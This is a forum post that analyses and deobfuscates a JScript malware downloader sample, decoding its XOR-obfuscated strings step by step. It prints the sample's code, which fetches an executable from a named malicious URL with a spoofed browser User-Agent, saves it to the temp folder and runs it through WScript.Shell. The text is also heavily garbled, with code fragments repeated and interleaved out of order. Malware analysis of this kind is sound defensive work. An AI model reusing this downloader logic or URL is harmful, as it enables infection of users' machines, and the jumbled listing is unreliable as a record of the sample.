- May 14, 2016
- 1,597
1055.js
Sample 9 From https://malwaretips.com/threads/4-9-16-9.63068/
(thks to @Solarquest )
6/46
https://www.virustotal.com/en/file/...4a246f75114a2e9c22fc952f23949902e90/analysis/
Why this sample ?
Same reason as usual, I never analyzed the obfuscation used in this script.
1) What it looks like :
After I have deleted all the trash parts, only put to obfuscate a bit more :
Real part used :
I have done a modification to avoid : copy-paste => exec => infection
2) Analyse :
2-1) Main part
We can see the main part that begins after functions :
2-1-1 ) function DMTYQWD :
2-1-1 ) Inside the if : long parts
The function above is called several time, with parameter build the same way as seen above : concatenation of different var contents :
var BHGZY = DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F", VEOSXK);
var ZJFHO = DMTYQWD(BHGZY);
=> It's easy to understand that, this time, DVUNKGXA is a decoding function
2-1-2 ) Let's find the value of VEOSXK, 2nd parameter :
VEOSXK = 203 => value used for the XOR part !
2-1-3 ) With this value, let's go analyse the decode function :
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK)
"Scripting.FileSystemObject"
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK);
"expandEnvironmentStrings"
DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U", VEOSXK);
"%TEMP%"
DVUNKGXA("EEO9FC8EQ86E9BREEF", VEOSXK)
"GetTempName"
DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK", VEOSXK);
"WinHttp.WinHttpRequest.5.1"
DVUNKGXA("E5LAEBB3TAES", VEOSXK);
".exe"
DVUNKGXA("A4VBBOAEGA5Z", VEOSXK);
"open"
DVUNKGXA("ACCAEWBFP", VEOSXK);
"get"
DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B", VEOSXK);
"http: //lotoelhots.top/log.php?f=error.sys"
DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z", VEOSXK);
"SetRequestHeader"
DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW", VEOSXK);
"User-Agent"
DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I", VEOSXK);
"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
DVUNKGXA("B8XAEKA5XAFL", VEOSXK);
"send"
DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G", VEOSXK);
"ADODB.Stream"
DVUNKGXA("84JBBWAEJA5X", VEOSXK);
"Open"
DVUNKGXA("9FYB2MBBAAEN", VEOSXK);
"Type" (= 1)
DVUNKGXA("9CPB9CA2QBFDAEQ", VEOSXK);
"Write"
DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J", VEOSXK);
"ResponseBody"
LAST PART :
Sample 9 From https://malwaretips.com/threads/4-9-16-9.63068/
(thks to @Solarquest )
6/46
https://www.virustotal.com/en/file/...4a246f75114a2e9c22fc952f23949902e90/analysis/
Why this sample ?
Same reason as usual, I never analyzed the obfuscation used in this script.
1) What it looks like :
After I have deleted all the trash parts, only put to obfuscate a bit more :
Real part used :
function_DVUNKGXA(RMNYF,VEOSXK){
function DMTYQWD(FSJIEQ) {
var GCQRIZI=false;
try {
VBVSIJC="o";
YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ]();
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
for (var HLTHO=0;HLTHO<HSDCF;HLTHO+=3) {
return DISGB;
}; YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ]();
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
for (var HLTHO=0;HLTHO<HSDCF;HLTHO+=3) {
SUFPWP="x";
KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+PXSIR[MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG](HLTHO, 2);
var COJSPB=parseInt(ZSGVJ);
var CMQLHAF=COJSPB ^ VEOSXK;
CEXDQHZJ="C";
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
}; KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+PXSIR[MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG](HLTHO, 2);
var COJSPB=parseInt(ZSGVJ);
var CMQLHAF=COJSPB ^ VEOSXK;
CEXDQHZJ="C";
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
return DISGB;
function DMTYQWD(FSJIEQ) {
IFEIKY="b";
LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
}; LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
var GCQRIZI=false;
try {
BFIDZSGAU="O";
VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} catch (BQNMSV) {
};
if (!GCQRIZI) {
}; VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} catch (BQNMSV) {
};
if (!GCQRIZI) {
LEOQRTKMI="i";
RVMXUFDC="l";
NAZUNWZV="S";
MYDHZLAJ="t";
WZXYJIC="S";
RQTXTKFDV=".";
SCSANW="r";
QXHIWE="h";
MJEBF="p";J
ZDYAB="e";
PBTOFMG="c";
RLYHFTB="W";
IUOQXNVG="l";
var TXAMBU=DMTYQWD(RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG);
JVUKGPIM="o";
JHWDNO="r";
MBLWGTA="n";
GPDYH="d";
YOFQKC="n";
EFDXN="e";
QJRLYA="i";
YUCIJFU="S";
BQKWS="t";
DZIVAHYSB="E";
XVOKPOZ="x";
KJSQAZ="n";
RQCHOZGAR="v";
NJAJV="n";
RTUCECF="p";
WGTIRGO="a";
JIENIDQLF="s";
SHPSLZY="E";
GFHRLAV="r";
ICODUDZHQ="g";
NGHCXU="n";
TBKREUV="m";
DFNZJWOV="t";
XUFYV="i";
YLBUO="D";
NMBOGRWK="A";
GJFEKSJI="P";
UKYMSR="T";
JPSYMX="A";
JWCTCWQED="%";
PBWENOPJ="A";
EPUVSREF="P";
WIKNZVHG="%";
MZWQYF=TXAMBU[SHPSLZY+XVOKPOZ+RTUCECF+WGTIRGO+NGHCXU+GPDYH+DZIVAHYSB+YOFQKC+RQCHOZGAR+QJRLYA+JHWDNO+JVUKGPIM+KJSQAZ+TBKREUV+EFDXN+MBLWGTA+DFNZJWOV+YUCIJFU+BQKWS+GFHRLAV+XUFYV+NJAJV+ICODUDZHQ+JIENIDQLF](JWCTCWQED+JPSYMX+EPUVSREF+GJFEKSJI+YLBUO+PBWENOPJ+UKYMSR+NMBOGRWK+WIKNZVHG);
DAJVOUACS="A";
JSDXPTCD="h";
UIRUK="e";
LAJSXHJ="t";
JGQJRISVW="a";
ZRYMN="o";
CNFAWAPX="d";
CNBIYSARA="c";
RQYPECKVM="C";
LHPVPYFES="r";
var VEOSXK=MZWQYF[CNBIYSARA+JSDXPTCD+JGQJRISVW+LHPVPYFES+RQYPECKVM+ZRYMN+CNFAWAPX+UIRUK+DAJVOUACS+LAJSXHJ](113-111);
VEOSXK= VEOSXK+111;
var BHGZY=DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F",VEOSXK);
var ZJFHO=DMTYQWD(BHGZY);
var WPTGSVGX=DMTYQWD(DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY",VEOSXK));
var QIHARZ=ZJFHO[DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U",VEOSXK)](DVUNKGXA("EEO9FC8EQ86E9BREEF",VEOSXK));
QIHARZ=QIHARZ+"\\";
var UAYPLY=QIHARZ+WPTGSVGX[DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK",VEOSXK)]()+DVUNKGXA("E5LAEBB3TAES",VEOSXK);
var NCUFPVX=DMTYQWD(DVUNKGXA("9CIA2BA5T83LBFCBFUBBNE5F9CVA2MA5D83TBFLBFFBBU99IAEXBAKBEYAELB8CBFTE5SFELE5EFAX",VEOSXK));
NCUFPVX[DVUNKGXA("A4VBBOAEGA5Z",VEOSXK)](DVUNKGXA("ACCAEWBFP",VEOSXK),DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B",VEOSXK),false);
NCUFPVX[DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z",VEOSXK)](DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW",VEOSXK), DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I",VEOSXK));
NCUFPVX[DVUNKGXA("B8XAEKA5XAFL",VEOSXK)]();
var HAZXEJDW= DMTYQWD(DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G",VEOSXK));
HAZXEJDW[DVUNKGXA("84JBBWAEJA5X",VEOSXK)];
HAZXEJDW[DVUNKGXA("9FYB2MBBAAEN",VEOSXK)]=1;
HAZXEJDW[DVUNKGXA("9CPB9CA2QBFDAEQ",VEOSXK)](NCUFPVX[DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J",VEOSXK)]);
if(WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER",VEOSXK)];
if(!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z",VEOSXK)](UAYPLY);
RVMXUFDC="l";
NAZUNWZV="S";
MYDHZLAJ="t";
WZXYJIC="S";
RQTXTKFDV=".";
SCSANW="r";
QXHIWE="h";
MJEBF="p";J
ZDYAB="e";
PBTOFMG="c";
RLYHFTB="W";
IUOQXNVG="l";
var TXAMBU=DMTYQWD(RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG);
JVUKGPIM="o";
JHWDNO="r";
MBLWGTA="n";
GPDYH="d";
YOFQKC="n";
EFDXN="e";
QJRLYA="i";
YUCIJFU="S";
BQKWS="t";
DZIVAHYSB="E";
XVOKPOZ="x";
KJSQAZ="n";
RQCHOZGAR="v";
NJAJV="n";
RTUCECF="p";
WGTIRGO="a";
JIENIDQLF="s";
SHPSLZY="E";
GFHRLAV="r";
ICODUDZHQ="g";
NGHCXU="n";
TBKREUV="m";
DFNZJWOV="t";
XUFYV="i";
YLBUO="D";
NMBOGRWK="A";
GJFEKSJI="P";
UKYMSR="T";
JPSYMX="A";
JWCTCWQED="%";
PBWENOPJ="A";
EPUVSREF="P";
WIKNZVHG="%";
MZWQYF=TXAMBU[SHPSLZY+XVOKPOZ+RTUCECF+WGTIRGO+NGHCXU+GPDYH+DZIVAHYSB+YOFQKC+RQCHOZGAR+QJRLYA+JHWDNO+JVUKGPIM+KJSQAZ+TBKREUV+EFDXN+MBLWGTA+DFNZJWOV+YUCIJFU+BQKWS+GFHRLAV+XUFYV+NJAJV+ICODUDZHQ+JIENIDQLF](JWCTCWQED+JPSYMX+EPUVSREF+GJFEKSJI+YLBUO+PBWENOPJ+UKYMSR+NMBOGRWK+WIKNZVHG);
DAJVOUACS="A";
JSDXPTCD="h";
UIRUK="e";
LAJSXHJ="t";
JGQJRISVW="a";
ZRYMN="o";
CNFAWAPX="d";
CNBIYSARA="c";
RQYPECKVM="C";
LHPVPYFES="r";
var VEOSXK=MZWQYF[CNBIYSARA+JSDXPTCD+JGQJRISVW+LHPVPYFES+RQYPECKVM+ZRYMN+CNFAWAPX+UIRUK+DAJVOUACS+LAJSXHJ](113-111);
VEOSXK= VEOSXK+111;
var BHGZY=DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F",VEOSXK);
var ZJFHO=DMTYQWD(BHGZY);
var WPTGSVGX=DMTYQWD(DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY",VEOSXK));
var QIHARZ=ZJFHO[DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U",VEOSXK)](DVUNKGXA("EEO9FC8EQ86E9BREEF",VEOSXK));
QIHARZ=QIHARZ+"\\";
var UAYPLY=QIHARZ+WPTGSVGX[DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK",VEOSXK)]()+DVUNKGXA("E5LAEBB3TAES",VEOSXK);
var NCUFPVX=DMTYQWD(DVUNKGXA("9CIA2BA5T83LBFCBFUBBNE5F9CVA2MA5D83TBFLBFFBBU99IAEXBAKBEYAELB8CBFTE5SFELE5EFAX",VEOSXK));
NCUFPVX[DVUNKGXA("A4VBBOAEGA5Z",VEOSXK)](DVUNKGXA("ACCAEWBFP",VEOSXK),DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B",VEOSXK),false);
NCUFPVX[DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z",VEOSXK)](DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW",VEOSXK), DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I",VEOSXK));
NCUFPVX[DVUNKGXA("B8XAEKA5XAFL",VEOSXK)]();
var HAZXEJDW= DMTYQWD(DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G",VEOSXK));
HAZXEJDW[DVUNKGXA("84JBBWAEJA5X",VEOSXK)];
HAZXEJDW[DVUNKGXA("9FYB2MBBAAEN",VEOSXK)]=1;
HAZXEJDW[DVUNKGXA("9CPB9CA2QBFDAEQ",VEOSXK)](NCUFPVX[DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J",VEOSXK)]);
if(WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER",VEOSXK)];
if(!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z",VEOSXK)](UAYPLY);
I have done a modification to avoid : copy-paste => exec => infection
2) Analyse :
2-1) Main part
We can see the main part that begins after functions :
var GCQRIZI=false;
try {
catch (BQNMSV) {
};
if (!GCQRIZI) {
try {
BFIDZSGAU="O";
VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
catch (BQNMSV) {
};
if (!GCQRIZI) {
...
...
...
}...
...
2-1-1 ) function DMTYQWD :
A function named DMTYQWD is called with a parameter that is a concatenation of var contents, each var containing a char.
We can easily see that is equivalent to :
Here, the string seems coded, because it doesn't mean nothing.
(we will see later that in reality, the string as parameter is not decoded)
We can easily see that is equivalent to :
GCQRIZI=DMTYQWD("Q"+"O"+"G"+"M"+"Y");
GCQRIZI=DMTYQWD("QOGMY");
first conclusion : DMTYQWD is a function that is call with String.GCQRIZI=DMTYQWD("QOGMY");
Here, the string seems coded, because it doesn't mean nothing.
(we will see later that in reality, the string as parameter is not decoded)
function DMTYQWD(FSJIEQ) {
WScript["C"+"r"+"e'+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](FSJIEQ)
WScript["CreateObject"](FSJIEQ)
WScript.CreateObject(FSJIEQ)
with :
IFEIKY="b";
LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
};LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
WScript["C"+"r"+"e'+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](FSJIEQ)
WScript["CreateObject"](FSJIEQ)
WScript.CreateObject(FSJIEQ)
with :
GCQRIZI=DMTYQWD("QOGMY");
WScript.CreateObject("QOGMY")
=> will automatically fail
WScript.CreateObject("QOGMY")
=> will automatically fail
remember that :
var GCQRIZI=false; at the begin of this part
Then, the if part is evaluated
Conlusion :
DMTYQWD is used to create an object, given as parameter in CLEAR
This first time, it was with a parameter of an invalid object string
=> will then allows to enter the if part
if ( ! GCQRIZI) {
Conlusion :
DMTYQWD is used to create an object, given as parameter in CLEAR
This first time, it was with a parameter of an invalid object string
=> will then allows to enter the if part
if ( ! GCQRIZI) {
...
...
...
}...
...
2-1-1 ) Inside the if : long parts
The function above is called several time, with parameter build the same way as seen above : concatenation of different var contents :
var TXAMBU=DMTYQWD(
RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG
=> "WScript.Shell"
);
RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG
=> "WScript.Shell"
);
=> WScript.CreateObject("WScript.Shell")
But In a lot of other parts, the function DMTYQWD is called with as parameter a var, whose content is build by a function : DVUNKGXA
var BHGZY = DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F", VEOSXK);
var ZJFHO = DMTYQWD(BHGZY);
=> It's easy to understand that, this time, DVUNKGXA is a decoding function
2-1-2 ) Let's find the value of VEOSXK, 2nd parameter :
A lot of part are build with the same method, concatenation of strings from var.
(1) MZWQYF = TXAMBU[
(1) MZWQYF = TXAMBU[
SHPSLZY + XVOKPOZ + RTUCECF + WGTIRGO + NGHCXU + GPDYH + DZIVAHYSB + YOFQKC + RQCHOZGAR + QJRLYA + JHWDNO + JVUKGPIM + KJSQAZ + TBKREUV + EFDXN + MBLWGTA + DFNZJWOV + YUCIJFU + BQKWS + GFHRLAV + XUFYV + NJAJV + ICODUDZHQ + JIENIDQLF
=> "ExpandEnvironmentStrings"
](
=> "ExpandEnvironmentStrings"
](
JWCTCWQED + JPSYMX + EPUVSREF + GJFEKSJI + YLBUO + PBWENOPJ + UKYMSR + NMBOGRWK + WIKNZVHG
=> "%APPDATA%"
);=> "%APPDATA%"
We have seen that :
TXAMBU = WScript.CreateObject("WScript.Shell")
=> MZWQYF = TXAMBU["ExpandEnvironmentStrings"]("%APPDATA%")
(2) var VEOSXK = MZWQYF[=> MZWQYF = TXAMBU["ExpandEnvironmentStrings"]("%APPDATA%")
Example :
=> "C:\Users\DardiM\AppData\Roaming"
=> "C:\Users\DardiM\AppData\Roaming"
CNBIYSARA + JSDXPTCD + JGQJRISVW + LHPVPYFES + RQYPECKVM + ZRYMN + CNFAWAPX + UIRUK + DAJVOUACS + LAJSXHJ
=> "charCodeAt"
](113 - 111);
=> "charCodeAt"
](113 - 111);
=> Example for me :
"C:\Users\DardiM\AppData\Roaming".charCodeAt(2)
=> 2 (0,1,2) => third char : "\" ==> 92 decimal
VEOSXK = 92 + 111 = 203 "C:\Users\DardiM\AppData\Roaming".charCodeAt(2)
=> 2 (0,1,2) => third char : "\" ==> 92 decimal
VEOSXK = 203 => value used for the XOR part !
function DVUNKGXA(RMNYF,VEOSXK){
Conclusion :
"9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
A loop retrieving 2 chars for the xor with 203, every 3 chars
With this string as example :
Now, we have all the elements to deobfuscate all parts
2-1-4) Let's deobuscate all parts :VBVSIJC="o";
YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[
CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ
=> "toSting"
]();
=>RMNYF["toString"]();
=>PXSIR = first_parameter to string (string to decode)
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
=> PXSIR["length]
=> HSDCF = PXSIR.length => first_parameter length (string length)
for (var HLTHO=0 ; HLTHO < HSDCF ; HLTHO+=3) {
=> index from 0 ; index < first_parameter length, index=index+
return DISGB; // return the first parameter string decoded};YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[
CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ
=> "toSting"
]();
=>RMNYF["toString"]();
=>PXSIR = first_parameter to string (string to decode)
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
=> PXSIR["length]
=> HSDCF = PXSIR.length => first_parameter length (string length)
for (var HLTHO=0 ; HLTHO < HSDCF ; HLTHO+=3) {
=> index from 0 ; index < first_parameter length, index=index+
SUFPWP="x";
KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+
PXSIR[
MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG
=> "substr"
]
(HLTHO, 2);
=> get two char from string to decode, at current index
=> (index,2)
=> example with "9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
=> FIRST LOOP
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
=> String["fromCharCode"](CMQLHAF);
=> DISGB+=String.fromCharCode(CMQLHAF);
=> 87 => "W"
}; KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
